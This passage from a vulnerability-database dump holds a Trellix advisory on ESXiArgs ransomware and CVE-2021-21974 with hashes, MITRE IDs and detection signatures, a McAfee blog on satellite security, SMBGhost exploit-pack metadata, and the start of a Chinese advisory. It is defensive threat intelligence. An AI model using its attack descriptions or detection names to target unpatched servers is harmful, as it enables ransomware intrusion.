local environment. With that in mind, attackers are actively scanning internet resources for public facing devices to identify server services and or protocols that may be exploitable and have been exposed to the internet. \n\n## How it is it exploited?\n\nAccording to VMware, the proof-of-concept code available and activity that has been observed, threat actors are actively scanning the internet for vulnerable ESXiArgs servers that are susceptible to this remote code execution vulnerability. Once the exploitable machine is identified the attacker attempts to create a heap buffer overflow and execute code remotely to compromise the server.\n\nOften the vulnerable service or protocol has a patch available but not deployed and the threat actors use publicly known, or known to the attacker, code to exploit the vulnerabilities for initial access. As is in the case of the activity surrounding the ESXArgs attacks, the patch was available in early 2021; servers that are not updated or upgraded are targeted for compromise.\n\n## Our take\n\nThe ESXArgs ransomware activity follows VMware vulnerabilities previously reported on by our Trellix Advanced Research Center in 2022, (ContiESXi, NewGold). Once the vulnerability has been exploited, threat actors deploy a ransomware variant dubbed ESXArgs. This is due to artifacts identified in analyzed samples as well as the fact an \u201c. args\u201d extension is appended to targeted files, which also contain metadata that is suspected to aid in the identification and decryption process. Files targeted by the threat actors include those with the following extensions: \u201c.vmxf\u201d, \u201c.vmx\u201d, \u201c.vmdk\u201d, \u201c.vmsd\u201d, and \u201c.nvram\u201d extensions. Once the targeted data is encrypted, the malware performs clean up tasks to deleting log files, remove the Python based backdoor and delete various lines from several files to hinder recovery and analysis.\n\n _Figure 2: Global Telemetry for file hashes in Trellix ATLAS_ \n\n\n## Remediation and mitigation\n\n[VMware](<https://blogs.vmware.com/security/2023/02/83330.html>) has acknowledged the vulnerability exists and published a patch to fix the vulnerability in February of 2021. They have also provided documentation on the vulnerable versions currently being targeted as of their public release on Monday, January 6, 2023. Upgrading and/or patching is the recommended course of action where and as soon as possible, as well as the disablement of the OpenSLP protocol. \n\nFurthermore, the Cybersecurity &amp; Infrastructure Security Agency ([CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2023/02/07/cisa-releases-esxiargs-ransomware-recovery-script>)) has published a recovery script for those who have been victimized by the ESXiArgs campaign. \n\n## Conclusion\n\nConflicting information as to whether the malware has successfully exfiltrated data exists, and the variant of ransomware is speculated to be redeveloped source code form the leaked and now defunct Babuk Ransomware family. Regardless of speculation or fact, it is important server administrators follow recommendations for remediation by VMware to patch vulnerable servers and disable the OpenSLP service wherever possible.\n\nThe Trellix Advanced Research Center continues to monitor the ESXiArgs activity and will provide updates to telemetry, detections and indicators vetted by our research teams.\n\n## Indicators of compromise:\n\n**948e6d82d625ec2ebec2b2e5ee21ada8** | encrypt.sh \n---|--- \n**c358fe0e8837cc577315fc38892b937d** | python.py \n**d0d36f169f1458806053aae482af5010** | encrypt.sh \n**df1921871117dc84e9d1faf361656a83** | encrypt.sh \n**87b010bc90cd7dd776fb42ea5b3f85d3** | encrypt \n**561f5507e28a8822e463b0bd274b71d2** | CVE-2021-21974.py \n**03b318795ef7926d25f9ec3cb6b00cd5** | hostd-probe.sh \n**566bc3ae2de680a524e2ec3fc2247826** | local.sh \n \n## MITRE IDs:\n\n**T1059 - Command and Scripting Interpreter** \n--- \n**T1064 - Scripting** \n**T1543.002 - Systemd Service** \n**T1522 - File and Directory Permission Modification** \n**T1027 - Obfuscated Files or Information** \n**T1082 - System Information Discovery** \n**T1083 - File and Directory Discovery** \n**T1518.001 - Security Software Discovery** \n**T1071 - Application Layer Protocol** \n**T1573 - Encrypted Channel** \n**T1070 - Indicator Removal** \n**T1070.004 - File Deletion** \n**T1574.002 - DLL Side-Loading** \n**T1497 - Virtualization/Sandbox Evasion** \n**T1070.006 - Timestomp** \n**T1057 - Process Discovery** \n**T1095 - Non-Application Layer Protocol** \n**T1059.004 - Unix Shell** \n**T1190 - Exploit Public-Facing Application** \n**T1522 - Cloud Instance Metadata API** \n**T1489 - Service Stop** \n**T1486 - Data Encrypted for Impact** \n \n## Trellix Product Coverage:\n\n**Product** | **Signature** \n---|--- \nEndpoint Security (ENS) | Ransom-ESXiArgs.a \nBackdoor-ESXi.a \nBackdoor-ESXi.b \nBackdoor-ESXi.c \nCVE-2021-21974 \nLinux/Encryptor \nLinux/Ransom!2902E12F00A1 \n \nEndpoint Security (HX) | ESXIARGS RANSOMWARE LINUX (FAMILY) \nTrojan.Linux.Generic.293309 \nTrojan.GenericKD.65332757 \n \nNetwork Security(NX) Detection as a Service \nEmail Security \nMalware Analysis \nFile Protect \n| Ransomware.Linux.Generic.MVX Trojan.Linux.Generic.MVX \nFE_Trojan_Linux64_Generic_10 \nFE_Trojan_Linux_Generic_31 \nFEC_Exploit_PY_CVE202121974_1 \nFEC_Ransomware_SH_Generic_2 \nFEC_Backdoor_PY_Generic_4 \nFEC_Trojan_SH_Generic_14 \n \nHelix | rule ID-1.1.3987 (ESXIARGS RANSOMWARE [Linux arguments]) \nrule ID-1.1.3989 (EXPLOIT - VMWARE [CVE-2021-21972 Success]) \n \n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-02-09T00:00:00", "type": "trellix", "title": "Global ESXiArgs ransomware attack on the back of a two-year-old vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21974"], "modified": "2023-02-09T00:00:00", "id": "TRELLIX:78F3E55FEB758A52865B523C8DE8162F", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/global-esxiargs-ransomware-attack-on-the-back-of-a-two-year-old-vulnerability.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-09-30T00:00:00", "description": "#### ARCHIVED STORY\n\n# Securing Space 4.0 \u2013 One Small Step or a Giant Leap? - Part 1\n\nBy Eoin Carroll \u00b7 September 30, 2020\n\nMcAfee Advanced Threat Research (ATR) is collaborating with [Cork Institute of Technology](<https://www.cit.ie/>) (CIT) and its [Blackrock Castle Observatory](<https://www.bco.ie/>) (BCO) and the [National Space Center](<http://nationalspacecentre.eu/>) (NSC) in Cork, Ireland\n\n \n\n\nThe essence of Space 4.0 is the introduction of smaller, cheaper, faster-to-the-market satellites in low-earth-orbit into the value chain and the exploitation of the data they provide. Space research and communication prior to Space 4.0 was primarily focused on astronomy and limited to that of governments and large space agencies. As technology and society evolves to consume the [\u201cNew Big Data\u201d](<https://www.forbes.com/sites/bernardmarr/2017/10/19/why-space-data-is-the-new-big-data/>) from space, Space 4.0 looks set to become the next battleground in the defense against cybercriminals. Space 4.0 data can range from earth observation sensing to location tracking information and applied across many vertical uses cases discussed later in this blog. In the era of Space 4.0 the evolution of the space sector is rapidly changing with a lower cost of launching, combined with public and private partnerships that open a whole new dimension of connectivity. We are already struggling to secure our data on earth, we must now understand and secure how our data will travel through [space constellations and be stored in cloud data centers](<http://spacebelt.com/>) on earth and in space.\n\nLow Earth Orbit (LEO) satellites are popular for scientific usage but how secure are they? The Internet of Things (IoT) introduced a myriad of insecure devices onto the Internet due to the low cost of processors and high-speed connectivity, but the speed in its adoption resulted in a large fragmentation of insecure hardware and software across business verticals.\n\nSpace 4.0 is now on course for a similar rapid adoption with [nanosats](<https://www.nanosats.eu/cubesat>) as we prepare to see a mass deployment of cheap satellites into LEO. These small satellites are being used across government, academic and commercial sectors for different use cases that require complex payloads and processing. Many nanosats can coexist on a single satellite. This means that the same satellite backbone circuit infrastructure can be shared, reducing build and launch costs and making space data more accessible.\n\nTo date, satellites have typically been relay type devices repeating signals to and from different locations on earth in regions with poor internet connectivity, but that is all set to change with a mass deployment of smarter satellite devices using inter-satellite links (ISL) in constellations like [Starlink](<https://www.starlink.com/>) which aim to provide full high speed broadband global coverage. As the Space 4.0 sector is moving from private and government sectors to general availability, this makes satellites more accessible from a cost perspective, which will attract threat actors other than nation states, such as cyber criminals. Space 4.0 also brings with it new service delivery models such as Ground Station as a Service (GSaaS) with [AWS](<https://aws.amazon.com/ground-station/>) and [Azure Orbital](<https://azure.microsoft.com/en-au/services/orbital/>) and [Satellite as a Service (SataaS)](<https://www.loftorbital.com/>). With the introduction of these, the satellite will become another device connecting to the cloud.\n\nIn our research we analyze the ecosystem to understand the latest developments and threats in relation to cybersecurity in space and whether we are ready to embrace Space 4.0 securely.\n\n### Space 4.0 Evolution\n\nWhat is the [Industrial 4th Revolution](<https://www.youtube.com/watch?v=kpW9JcWxKq0>)? The original industrial revolution started with the invention of steam engines then electricity, computers and communication technology. Industry 4.0 is about creating a diverse, safe, healthy, just world with clean air, water, soil and energy, as well as finding a way to pave the path for the innovations of tomorrow.\n\nThe first space era, or Space 1.0, was the study of astronomy, followed by the Apollo moon landings and then the inception of the International Space Station (ISS). [Space 4.0](<https://www.esa.int/About_Us/Ministerial_Council_2016/What_is_space_4.0>) is analogous to Industry 4.0, which is considered as the unfolding fourth industrial revolution of manufacturing and services. Traditionally, access to space has been the domain of governments and large space agencies (such as NASA or the European Space Agency) due to the large costs involved in the development, deployment and operation of satellites. In recent years, a new approach to using space for commercial, economic and societal good has been driven by private enterprises in what is termed New Space. When combined with the more traditional approach to space activity, the term \u201cSpace 4.0\u201d is used. Space 4.0 is applicable across a wide range of vertical domains, including but not limited to:\n\n * Ubiquitous broadband\n * Autonomous vehicles\n * Earth observation\n * Disaster mitigation/relief\n * Human spaceflight\n * Exploration\n\n### Cyber Threat Landscape Review\n\nThe Cyber Threat Landscape has evolved greatly over the past 20 years with the convergence of Information Technology (IT), Operational Technology (OT) and IoT. Protecting consumers, enterprises and critical infrastructure with the rapid parallel innovation of technology and cybercriminals is a constant challenge. While technology and attacks evolve rapidly the cybercriminal motive remains a constant; make money and maximize profit by exploiting a combination of users and technology.\n\nCybercriminals have much more capabilities now than they did 10 years ago due to the rise of Cybercrime as a Service (CaaS). Once an exploit for a vulnerability has been developed, it can then be weaponized into an exploit kit or ransomware worm, such as WannaCry. Cybercriminals will follow the path of least resistance to achieve their goal of making money.\n\nNearly every device class across the business verticals, ranging from medical devices to space [Very-small-aperture terminals](<https://en.wikipedia.org/wiki/Very-small-aperture_terminal>) (VSAT), have been hacked by security researchers, as evident from [Blackhat and Defcon trends](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2019-threats-predictions/>).\n\nFrom a technology stack perspective (hardware and software) there have been vulnerabilities discovered and exploits developed across all layers where we seek to establish some form of trustworthiness when connected to the internet; browsers, operating systems, protocols, hypervisors, enclaves, cryptographic implementations, system on chips (SoC) and processors.\n\nNot all these vulnerabilities and exploits become weaponized by cybercriminals, but it does highlight the fact that the potential exists. Some notable weaponized exploits are:\n\n * [Stuxnet worm](<https://en.wikipedia.org/wiki/Stuxnet>)\n * [WannaCry ransomware worm](<https://www.mcafee.com/blogs/other-blogs/executive-perspectives/wannacry-old-worms-new/>)\n * [Triton malware](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems/>)\n * [Mirai Botnet](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mirai-botnet-creates-army-iot-orcs/>)\n\nSome recent major industry vulnerabilities were: [BlueKeep](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) (Windows RDP Protocol), [SMBGhost](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/>) (Windows SMB Protocol), [Ripple20](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-critical-vulnerabilities-detection-logic-and-signatures/>) (Treck embedded TCP/IP library), [Urgent 11](<https://www.armis.com/urgent11/>) (VxWorks TCP/IP library), [Heartbleed](<https://heartbleed.com/>) (OpenSSL library), [Cloudbleed](<https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/>) (Cloudflare), [Curveball](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/curveball-an-unimaginative-pun-but-a-devastating-bug/>) (Microsoft Crypto API), [Meltdown and Spectre](<https://meltdownattack.com/>) (Processor side channels).\n\nCybercriminals will adapt quickly to maximize their profit as we saw with the COVID-19 pandemic and the mass remote workforce. They will quickly understand the operating environment changes and how they can reach their goals by [exploiting users and technology](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/transitioning-to-a-mass-remote-workforce-we-must-verify-before-trusting/>), whichever is the weakest link. The easiest entry point into an organization will be through identity theft or weak passwords being used in remote access protocols such as [RDP](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cybercriminals-actively-exploiting-rdp-to-target-remote-organizations/>).\n\nCybercriminals moved to the Dark Web to hide identity and physical location of servers or using bullet-proof providers to host their infrastructure. What if these services are hosted in space? Who is the legal entity and who is responsible?\n\nMcAfee [Enterprise Supernova](<https://www.mcafee.com/enterprise/en-us/solutions/lp/mcafee-data-dispersion-cloud-adoption-risk-report.html>) Cloud analysis reports that:\n\n * Nearly one in 10 files shared in the cloud with sensitive data have public access, an increase of 111% year over year\n * One in four companies have had their sensitive data downloaded from the cloud to an unmanaged personal device, where they cannot see or control what happens to the data\n * 91% of cloud services do not encrypt data at rest\n * Less than 1% of cloud services allow encryption with customer-managed keys\n\nThe transition to the cloud, when done securely, is the right business decision. However, when not done securely it can leave your services and [data/data lakes](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2019-threats-predictions/>) accessible to the public through misconfigurations (shared responsibility model), [insecure APIs](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2020-threats-predictions-report/#API>), and identity and access management issues. Attackers will always go for the low hanging fruit such as open AWS buckets and credentials through vendors in the supply chain.\n\nOne of the key initiatives, and now industry benchmark, is the [MITRE ATT&amp;CK](<https://www.mcafee.com/blogs/enterprise/cloud-security/introducing-mitre-attck-in-mvision-cloud-defend-with-precision/>) framework which enumerates the TTPs from real word incidents across Enterprise (Endpoint and Cloud), Mobile and ICS. This framework has proved to be very valuable in enabling organizations to understand adversary TTPs and the corresponding protect, detect and response controls required in their overall defense security architecture. We may well see a version of MITRE ATT&amp;CK evolve for Space 4.0.\n\n### Space Cyber Threat Landscape Review\n\nThreat actors know no boundaries as we have seen criminals move from traditional crime to cybercrime using whatever means necessary to make money. Likewise, technology communication traverses many boundaries across land, air, sea and space. With the reduced costs to entry and the commercial opportunities with Space 4.0 big data, we expect to see cybercriminals innovating within this huge growth area. The Cyber Threat Landscape can be divided into vulnerabilities discovered by security researchers and actual attacks reported in the wild. This allows us to understand the technologies within the space ecosystem that are known to contain vulnerabilities and what capabilities threat actors have and are using in the wild.\n\nVulnerabilities discovered to date have been within VSAT terminal systems and intercepting communications. There have been no vulnerabilities disclosed on actual satellites from figure 1 below.\n\n **Figure 1 \u2013 Security Researcher space vulnerability disclosures** \n\n\nTo date, satellites have mostly been controlled by governments and the military so little information is available as to whether an actual satellite has been hacked. We do expect to see that change with Space 4.0 as these satellites will be more accessible from a hardware and software perspective to do security analysis. Figure 2 below highlights reported attacks in the wild.\n\n **Figure 2 \u2013 Reported Attacks in the Wild** \n\n\nIn [Operation North Star](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/>)\u201d, we observed an increase in malicious cyber activity targeting the Aerospace and Defense industry. The objective of these campaigns was to gather information on specific programs and technologies.\n\nSince the introduction of the cloud, it appears everything has become a device that interacts with a service. Even cybercriminals have been adapting to the service model. Space 4.0 is no different as we start to see the adoption of the Ground Station as a Service (GSaaS) and Satellite as a Service (SataaS) models per figure 3 below. These services are opening in the space sector due to the acceleration of vendors into Space 4.0 to help keep their costs down. Like any new ecosystem this will bring new attack surfaces and challenges which we will discuss in the Threat Modelling section.\n\n **Figure 3 \u2013 New Devices and Services for Space 4.0** \n\n\nSo, with the introduction of cheap satellites using [commercial off-the-shelf](<https://en.wikipedia.org/wiki/Commercial_off-the-shelf>) (COTS) components and new cloud services is it just a matter of time before we see mass satellite attacks and compromise?\n\n### Space 4.0 Data Value\n\nThe [global space industry grew](<http://www.eib.org/attachments/thematic/future_of_european_space_sector_en.pdf>) at an average rate of 6.7% per year between 2005 and 2017 and is projected to rise from its current value of $350 billion to $1.3 trillion per annum by 2030. This rise is driven by new technologies and business models which have increased the number of stakeholders and the application domains which they service in a cost-effective way. The associated increase in data volume and complexity has, among other developments, resulted in increasing concerns over the security and integrity of data transfer and storage between satellites, and between ground stations and satellites.\n\nThe [McAfee Supernova report](<https://www.mcafee.com/blogs/enterprise/cloud-security/data-goes-supernova-exploring-security-at-the-cloud-edge/>) shows that data is exploding out of enterprises and into the cloud. We are now going to see the same explosion from Space 4.0 to the cloud as vendors race to innovate and monetize data from low cost satellites in LEO.\n\n[According to Microsoft](<https://blogs.microsoft.com/latinx/2020/09/22/introducing-azure-orbital-process-satellite-data-at-cloud-scale/>) the processing of data collected from space at cloud-scale to observe the Earth will be \u201cinstrumental in helping address global challenges such as climate change and furthering of scientific discovery and innovation\u201d. The [value of data from space](<http://interactive.satellitetoday.com/via/august-2018/how-do-you-value-data-from-space/>) must be viewed from the perspective of the public and private vendors who produce and consume such data. Now that satellite launch costs have reduced, producing this data becomes more accessible to commercial markets, so we are going to see much innovation in data analytics to improve our lives, safety and preservation of the earth. This [data can be used](<https://web-strategist.com/blog/2019/06/23/satellites-as-a-service-what-why-and-how/>) to improve emergency response times to save lives, monitoring illegal trafficking, aviation tracking blind spots, government scientific research, academic research, improving supply chains and monitoring the earth\u2019s evolution, such as climate change effects. Depending on the use case, this data may need to be confidential, may have privacy implications when tracking and may have substantial value in the context of new markets, innovation and state level research. It is very clear that data from space will have much value as new markets evolve, and cybercriminals will most certainly target that data with the intent to hold organizations to ransom or sell data/analytics innovation to competitors to avoid launch costs. Whatever the use case and value of the data traveling through space may be, we need to ensure that it moves securely by providing a trustworthy end to end ecosystem.\n\nAs we progress towards the [sixth digital era](<https://web-strategist.com/blog/2019/06/03/speech-the-six-digital-eras-illuminates-a-roadmap/>), our society, lives and connectivity will become very dependent on off-planet data and technology in space, starting with SataaS.\n\nIn Part 2 we will discuss remote computers in Space, the Space 4.0 threat model and what we must do to secure Space 4.0 moving forward.\n\nMcAfee would like to thank [Cork Institute of Technology](<https://www.cit.ie/>) (CIT) and their [Blackrock Castle Observatory](<https://www.bco.ie/>) (BCO) and the [National Space Center](<http://nationalspacecentre.eu/>) (NSC) in Cork, Ireland for their collaboration in our mission to securing Space 4.0.\n", "cvss3": {}, "published": "2020-09-30T00:00:00", "type": "trellix", "title": "Securing Space 4.0 \u2013 One Small Step or a Giant Leap? - Part 1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2020-0796"], "modified": "2020-09-30T00:00:00", "id": "TRELLIX:6373864BD1A0BAFE3430F237433C84A5", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/securing-space-4-0-one-small-step-or-a-giant-leap-part-1.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "canvas": [{"lastseen": "2021-07-28T14:33:14", "description": "**Name**| smbghost_lpe \n---|--- \n**CVE**| CVE-2020-0796 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| smbghost_lpe \n**Notes**| CVE Name: CVE-2020-0796 \nNotes: Tested: - Windows 10 1903 x64 - Windows 10 1909 x64 \nVENDOR: Microsoft \nCVE Url: https://nvd.nist.gov/vuln/detail/CVE-2020-0796 \nCVSS: 10.0 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "type": "canvas", "title": "Immunity Canvas: SMBGHOST_LPE", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T16:15:00", "id": "SMBGHOST_LPE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smbghost_lpe", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:16", "description": "**Name**| SMBGHOST \n---|--- \n**CVE**| CVE-2020-0796-1 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMBGHOST \n**Notes**| CVE Name: CVE-2020-0796 \nVENDOR: Microsoft \nNOTES: some notes here \n \nVersionsAffected: VERSIONS \nRepeatability: None \nReferences: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 \nDate public: 4/13/2020 \nCVSS: 10.0 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "type": "canvas", "title": "Immunity Canvas: SMBGHOST", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T16:15:00", "id": "SMBGHOST", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/SMBGHOST", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2021-01-01T04:42:18", "description": "Recently, Qi'an letter of Threat Intelligence Center released Microsoft WindowsSMBv3 service remote code execution vulnerability announcements. Notice that 3 on 11 May, the foreign company released a recent Microsoft security patch design vulnerability summary, which includes a threat level is marked as Critical SMB service remote code execution vulnerability, the vulnerability number CVE-2020-0796, the vulnerability exists in the Windows SMBv3 file sharing and print services in. \nAccording to the Company Description, An attacker can exploit this vulnerability, the remote to send the special structure of malicious data, and without user authentication can lead to on the target system to execute malicious code, thereby acquiring the machine full control permissions. Odd Anxin Threat Intelligence Center the red rain team remind, the use of this vulnerability can be stably cau